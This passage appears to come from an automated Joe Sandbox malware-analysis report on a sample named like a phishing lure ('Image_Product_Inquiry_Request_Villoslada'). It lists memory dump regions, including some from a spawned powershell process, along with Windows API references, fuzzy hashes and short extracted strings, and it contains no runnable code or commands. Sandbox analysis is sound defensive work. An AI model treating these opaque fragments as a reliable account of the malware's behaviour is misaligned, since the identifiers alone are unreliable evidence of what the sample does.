                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrlen
                                                                        • String ID: C:\Users\user\Desktop
                                                                        • API String ID: 2709904686-1246513382
                                                                        • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                        • Instruction ID: 6b3ae82466a78d2b10de00fa1d507c540e6bf26c2d05194e9d44ea340b0cb8a4
                                                                        • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                        • Instruction Fuzzy Hash: 48D05EB24109209AC3126705EC089AF67A8EF5130074A842BF841A61A5D7785C8186AC
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E5E
                                                                        • CharNextA.USER32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E6F
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                        • Instruction ID: 98c30faecf84a4e678f1c8c5aee25e578da6ba24d366b38437dab149ad6906fd
                                                                        • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                        • Instruction Fuzzy Hash: 4AF06232504458FFD7029BA5DD04DAEBBA8EF16354B2540AAE884F7210D674EF01DBA9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$4']q$tL|k$tL|k$tL|k$tL|k$tL|k$tL|k$x.{k$x.{k$x.{k$-{k$-{k
                                                                        • API String ID: 0-3202702354
                                                                        • Opcode ID: 53f1416bb320fce1acabfa6183997d8cbcbbeb71dc2bb42b50347b8178fe9629
                                                                        • Instruction ID: 7fb16250e5ecdda577260c956639b77bf02103b232f7ccde53d9aee6214ea2a8
                                                                        • Opcode Fuzzy Hash: 53f1416bb320fce1acabfa6183997d8cbcbbeb71dc2bb42b50347b8178fe9629
                                                                        • Instruction Fuzzy Hash: CC0364B0A00214DFDB34DB64C990BEAB7B2EF85304F508899D919AB755CB32ED86CF51
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f906f824ddb14db6355d4119ce046d011af55d654685fc5c14b355a49b786b35
                                                                        • Instruction ID: cd16b2bf386b503d7ca871b55fb3fa2ba78565695f911f1f2da767f0a5920fad
                                                                        • Opcode Fuzzy Hash: f906f824ddb14db6355d4119ce046d011af55d654685fc5c14b355a49b786b35
                                                                        • Instruction Fuzzy Hash: 9A528F34B00619CFDB24DF68C8547ADB7B2AF84308F14959ADA09EB361EB34BD46CB51
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557345019.0000000004A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A0D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4a0d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 667580a4800313c42571fe320081a007f2c9f5c47673f1404f5000966d1af0f7
                                                                        • Instruction ID: 8f7b2b568950aa875d3cfbe503fcaf98b17c7cc8d9e3bdbe5cee01d6dda3a2f4
                                                                        • Opcode Fuzzy Hash: 667580a4800313c42571fe320081a007f2c9f5c47673f1404f5000966d1af0f7
                                                                        • Instruction Fuzzy Hash: C32132B1604240DFCB24DF24E5C0B26BBA5FB84314F20C66DED095B392C3BBE806C662
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                        • API String ID: 0-1903580985
                                                                        • Opcode ID: 913ac9e83ac121f3b0297323b36508766358ddb8f166b089e1abd09de0b5dbca
                                                                        • Instruction ID: beb1e77dbb8da1a54ee6af18eb84aa8f6d2fca06b675717c38e87d5dac62940e
                                                                        • Opcode Fuzzy Hash: 913ac9e83ac121f3b0297323b36508766358ddb8f166b089e1abd09de0b5dbca
                                                                        • Instruction Fuzzy Hash: 059291B0B00344DFDB24CB98C590BA9BBB6EF85714F1188A9D905AF751CB72EC45CB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$tL|k$tL|k$tL|k$tL|k$x.{k$x.{k$-{k$-{k
                                                                        • API String ID: 0-1674571408
                                                                        • Opcode ID: 1692c0dd3a2bba105f3e4c0fa226e496b2e778aab698ee9aa1bb08668575c6a1
                                                                        • Instruction ID: ad084d21327392dadfa81ee9bae87af3d12b5adfc7f376eb76c8fb0db300cc2d
                                                                        • Opcode Fuzzy Hash: 1692c0dd3a2bba105f3e4c0fa226e496b2e778aab698ee9aa1bb08668575c6a1
                                                                        • Instruction Fuzzy Hash: CEC288B0A003149FDB74DB54C990BEAB7B2EF89304F108899D919AB755CB32ED86CF51
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                                        • API String ID: 0-3121157708
                                                                        • Opcode ID: c81ea99f94520b9c76bba1123a7f42cabeb238112e78192673d725b2e76bd80b
                                                                        • Instruction ID: 5ab3e2d5f122b0d34c3706f8cd1b9725e6a3c7e9033d2b7b6679e3216caf5f34
                                                                        • Opcode Fuzzy Hash: c81ea99f94520b9c76bba1123a7f42cabeb238112e78192673d725b2e76bd80b
                                                                        • Instruction Fuzzy Hash: 807271B0B00344DFDB24CB58C581FA9BBB2EB85754F1188A9EA05AF751CB72EC45CB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q
                                                                        • API String ID: 0-2931719552
                                                                        • Opcode ID: 120d5eb5837bc7a3fe496ede08009f454bfeb3c9cf22500b76fb19786904e4c6
                                                                        • Instruction ID: 44583c4ce8bf7619d3da103c9c442ad7049892d2389058992a0106bb6d8a9b14
                                                                        • Opcode Fuzzy Hash: 120d5eb5837bc7a3fe496ede08009f454bfeb3c9cf22500b76fb19786904e4c6
                                                                        • Instruction Fuzzy Hash: F432CEB0B002089FDB24CB98C551BAABBB2EFC5714F54C869E9059F751CB72EC46CB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$x.{k$-{k
                                                                        • API String ID: 0-3535003682
                                                                        • Opcode ID: 0252d6cdc8c80640e00c67314b20149198b9b407b80e84610cab416cbd4ffbf6
                                                                        • Instruction ID: cfcfdadce70ccb8b8ee783337846e4a3283bf2b79151206357532fefcb414bd3
                                                                        • Opcode Fuzzy Hash: 0252d6cdc8c80640e00c67314b20149198b9b407b80e84610cab416cbd4ffbf6
                                                                        • Instruction Fuzzy Hash: 8BE1A2B0B002059FDB24DBA8C650BAEBBA2EF89350F15CC25D9016F795CB35EC46CB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$tL|k$tL|k$x.{k$-{k
                                                                        • API String ID: 0-752823316
                                                                        • Opcode ID: c0d2cead8566edcd1a88b39e9bce53557edb8e7e2f1528321968213ced0b5409
                                                                        • Instruction ID: 796e5c2ba7e99a9fcefa276149686018513b57992208fc3386c59bd4ad6fa2f5
                                                                        • Opcode Fuzzy Hash: c0d2cead8566edcd1a88b39e9bce53557edb8e7e2f1528321968213ced0b5409
                                                                        • Instruction Fuzzy Hash: AA8296B0A00254DFDB34DB54CA50BAAB7B2EF84344F10CDA9D90AAB745CB71AD86CF51
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$tL|k$x.{k$-{k
                                                                        • API String ID: 0-134767963
                                                                        • Opcode ID: 5b73fd3c915ac21a3dee0f8d4b83f2a92330a595e453b2d802086ed32be3a683
                                                                        • Instruction ID: 93ba2f0a6da303ec4cbec7178244d30b6869c80079889e2861a1942ea36fcbdf
                                                                        • Opcode Fuzzy Hash: 5b73fd3c915ac21a3dee0f8d4b83f2a92330a595e453b2d802086ed32be3a683
                                                                        • Instruction Fuzzy Hash: 9E6286B0A00254DFDB34DB58CA50B9EB7B2EF84344F10C8A9D50AAB745CB71AD86CF91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                        • API String ID: 0-2353078639
                                                                        • Opcode ID: 10eeb3e7042385613c884c8a0e41462883999c2deeeff398987d7395e1e0e18c
                                                                        • Instruction ID: 17426ff43475ccd16672370a9cb909c11adf95988ee583b56c8ae05e6dd573e5
                                                                        • Opcode Fuzzy Hash: 10eeb3e7042385613c884c8a0e41462883999c2deeeff398987d7395e1e0e18c
                                                                        • Instruction Fuzzy Hash: 3B7137B1B00216CFCF249FB998002BABBA5EFC5250F14897AD855DB351EB31D945C7E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$tL|k$x.{k$-{k
                                                                        • API String ID: 0-3171216188
                                                                        • Opcode ID: c79b59cb6c459138d8ee3c8001faa086c5a83841168f036fe4a9d53be7477917
                                                                        • Instruction ID: f1401f535634f62857047b8a68a95899f2406b872d469dc82cc5211d8b92c8f1
                                                                        • Opcode Fuzzy Hash: c79b59cb6c459138d8ee3c8001faa086c5a83841168f036fe4a9d53be7477917
                                                                        • Instruction Fuzzy Hash: FC5285B0A00254DFDB30DB54CA50B9EB7B2EF94344F10C9A9D90A6B785CB71AD86CF91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$tL|k$x.{k$-{k
                                                                        • API String ID: 0-3171216188
                                                                        • Opcode ID: 5102eed6b6f3f42acb8738ac663e6ac047850de326695110bb52189444baa248
                                                                        • Instruction ID: a3a57094be1e670dcc9aa64fc17c96518324ee8f1889a18a47987cbf4fec2de0
                                                                        • Opcode Fuzzy Hash: 5102eed6b6f3f42acb8738ac663e6ac047850de326695110bb52189444baa248
                                                                        • Instruction Fuzzy Hash: A04277B0A003149FD774DB64C990BEAB7B2EF85304F5088A9D9196B745CB32ED86CF51
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q
                                                                        • API String ID: 0-1785108022
                                                                        • Opcode ID: 456ca40a0d69656e87dad787b8b114ef7bb4c89dded0d33196c7c1bd8279b186
                                                                        • Instruction ID: e015b42b8d255d9149ae28ec822a2484ba903f7252fefe5b0650a549e6280f77
                                                                        • Opcode Fuzzy Hash: 456ca40a0d69656e87dad787b8b114ef7bb4c89dded0d33196c7c1bd8279b186
                                                                        • Instruction Fuzzy Hash: B3125BB17053518FCF259B7889147AA7BA29FC2350F148C7ADA05CF351DB36E846CBA2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$x.{k$-{k
                                                                        • API String ID: 0-3515066249
                                                                        • Opcode ID: 3fa62c99f7d0b6f46c13e9325621f8fa8f5fce0bd1b58be846dacdd673b3bacc
                                                                        • Instruction ID: eea3101be3d893f0de9bad9ae1e6403a1531a9046bb4641d050850557c52420e
                                                                        • Opcode Fuzzy Hash: 3fa62c99f7d0b6f46c13e9325621f8fa8f5fce0bd1b58be846dacdd673b3bacc
                                                                        • Instruction Fuzzy Hash: 47C1B3B0B002059FDB24CB98C540BAEBBB2EF89354F15C865D9056F795CB31E846CFA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$tL|k$x.{k
                                                                        • API String ID: 0-1379334323
                                                                        • Opcode ID: 9483d3857a34a73f5bcd484c76c45c10fe4fb61395edad199ba5e797077c0924
                                                                        • Instruction ID: a61403c0aa707d0b54f892f7b589714cdbb53d6baa76a99f01f0624e9b520548
                                                                        • Opcode Fuzzy Hash: 9483d3857a34a73f5bcd484c76c45c10fe4fb61395edad199ba5e797077c0924
                                                                        • Instruction Fuzzy Hash: A2123CB0A04215DFDB30CB54C980BA9B7B2FF86344F1088E9D95AAB790CB71AD85CF51
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$tL|k$x.{k
                                                                        • API String ID: 0-1379334323
                                                                        • Opcode ID: aab206a4c17bb061802fdcfc291c2656e2ace712071c00c181e9c20d5a09d452
                                                                        • Instruction ID: 36487dfbaa79a5291dc27ea5dd3f82a7422a7858e7e61d94cac073f82b7e7ed2
                                                                        • Opcode Fuzzy Hash: aab206a4c17bb061802fdcfc291c2656e2ace712071c00c181e9c20d5a09d452
                                                                        • Instruction Fuzzy Hash: 87121BB0B04215DFDB70DB54C980BA9B7B2EF86344F1088A9D91AAB790CB71ED85CF51
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $]q$$]q$$]q
                                                                        • API String ID: 0-182748909
                                                                        • Opcode ID: 9cdabed09e5e7381b7669181f6b971df47e3d36152f454f3971fb0bf82fa509f
                                                                        • Instruction ID: 77fecce2e52b41832e009b370039953ccb56f6291efa0b239ef702ac6e723c38
                                                                        • Opcode Fuzzy Hash: 9cdabed09e5e7381b7669181f6b971df47e3d36152f454f3971fb0bf82fa509f
                                                                        • Instruction Fuzzy Hash: D52177B131038A9BDF38556E9950B77B6DA9BC1792FB48C3AE945CB381CD36C809C321
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q
                                                                        • API String ID: 0-3120983240
                                                                        • Opcode ID: f5c41cb5f7cca5aa8d3249461add768e115502da62510560ac901fa59091af1d
                                                                        • Instruction ID: a62dc6b81ec98b59048213ceb4b77b53ffb16f928b6889730f4867c8af658506
                                                                        • Opcode Fuzzy Hash: f5c41cb5f7cca5aa8d3249461add768e115502da62510560ac901fa59091af1d
                                                                        • Instruction Fuzzy Hash: E8226CB0B00344DFDB20CB58C581FA9BBB2EB85754F2488A9E9099F751CB72ED45CB91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tP]q$tP]q
                                                                        • API String ID: 0-145478062
                                                                        • Opcode ID: c4268eabb396ec11b705c53676fd93bb3ca927999727ae2447adb5065c4ca9bc
                                                                        • Instruction ID: 259eef2646bcb7da192434c35cd149c2a85c3360d03862f3ba072af32e177707
                                                                        • Opcode Fuzzy Hash: c4268eabb396ec11b705c53676fd93bb3ca927999727ae2447adb5065c4ca9bc
                                                                        • Instruction Fuzzy Hash: 275159B17053459FCF258AA988107B7BBA6EFC2351F14C87BD545CB2A2CA71C844C7A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $]q$$]q
                                                                        • API String ID: 0-127220927
                                                                        • Opcode ID: be2f599ff426920641ab47664920fe63d463e21e5a6f9c81a726528b821719f2
                                                                        • Instruction ID: 6f440b4d9adcd84621b2a062d0bf563661cd6751c5dd5fb9db60285bedae354b
                                                                        • Opcode Fuzzy Hash: be2f599ff426920641ab47664920fe63d463e21e5a6f9c81a726528b821719f2
                                                                        • Instruction Fuzzy Hash: EC213AB13083C95FDF3506794990B627FA59FD3682F6988A7D984CB293D52A9848C331
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x.{k
                                                                        • API String ID: 0-2880906344
                                                                        • Opcode ID: 19a40f34eda3129a872ab9fb93e9aaad6c05f27aca8aa1218b75c66d64d77910
                                                                        • Instruction ID: e2fd04d3893b251b475c431c24a5e0b7fa1174787d2851e2c430334d7b997bca
                                                                        • Opcode Fuzzy Hash: 19a40f34eda3129a872ab9fb93e9aaad6c05f27aca8aa1218b75c66d64d77910
                                                                        • Instruction Fuzzy Hash: F531C270740200AFD7149BA8CA95BAF7AA3EFD5750F108824E9016F791CF76AC46CBE1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \vsq
                                                                        • API String ID: 0-3555922043
                                                                        • Opcode ID: cc7b1901b81045d340d616d6a69f5e1fab2d8f051d422f73e7886d3b31a27221
                                                                        • Instruction ID: 78520ad871d3d6efe5971b33c37a51c67a045a5ef5c61a78f52b79a53fef2b36
                                                                        • Opcode Fuzzy Hash: cc7b1901b81045d340d616d6a69f5e1fab2d8f051d422f73e7886d3b31a27221
                                                                        • Instruction Fuzzy Hash: 6C212C31A0E3D04FC3069B6CE9B04A57FB1AF8B21070501D7C585CF2B7D9286C09DBA6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q
                                                                        • API String ID: 0-1259897404
                                                                        • Opcode ID: cab4f18a97bad39531cfdbc50de79ab15df022d8443d008491431d3427b2d501
                                                                        • Instruction ID: 144a3e15040763b1cb03d2c0bae1a69b3ff9042c6be1f96c24b51e5ee068fddf
                                                                        • Opcode Fuzzy Hash: cab4f18a97bad39531cfdbc50de79ab15df022d8443d008491431d3427b2d501
                                                                        • Instruction Fuzzy Hash: 8C01D2313453402BD71DAB69BC50F6E376BEBC1615F5089B9D5094F2E6CE61BC0983D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q
                                                                        • API String ID: 0-1259897404
                                                                        • Opcode ID: 97ee416ef94c49d20eef62d6c0e2e825cb8699e0013bbda524c848b0e0ccc38e
                                                                        • Instruction ID: f9b3a738931ac481547795ec98e507e6a10b1eec9fb0a93c8fea5e136aa0d22a
                                                                        • Opcode Fuzzy Hash: 97ee416ef94c49d20eef62d6c0e2e825cb8699e0013bbda524c848b0e0ccc38e
                                                                        • Instruction Fuzzy Hash: 75F062313403002BE71CAA6AAC51B5E765BEBC4A14F608979D5055F3D6CDA1AC494395
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 78d8ec8b56805feb2e8dc45dc1a1b9132d0935e66f61f4bd77fb4373a5a43cc2
                                                                        • Instruction ID: bc31ed561710b1277fbd7063935cc49972d56872dd4dc9b0ad793d9b118d2bd5
                                                                        • Opcode Fuzzy Hash: 78d8ec8b56805feb2e8dc45dc1a1b9132d0935e66f61f4bd77fb4373a5a43cc2
                                                                        • Instruction Fuzzy Hash: 5ED13774E012489FCB05CFA8D980A9DFBF2EF88314F258559E945AB366C731ED45CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dff2a50fc66d7f93538692f87583ea0ba4210ef9cb0193c86460dea6e64da6e1
                                                                        • Instruction ID: 26cf69497326f0d5c345bc9bea546a772d1acd1e54438cb1f766332d5d3813a2
                                                                        • Opcode Fuzzy Hash: dff2a50fc66d7f93538692f87583ea0ba4210ef9cb0193c86460dea6e64da6e1
                                                                        • Instruction Fuzzy Hash: 00A19F31A00208DFDB14DFA4D944AADBBF2FF84304F119568E506AB368DB74BD49CB80
                                                                        Memory Dump Source
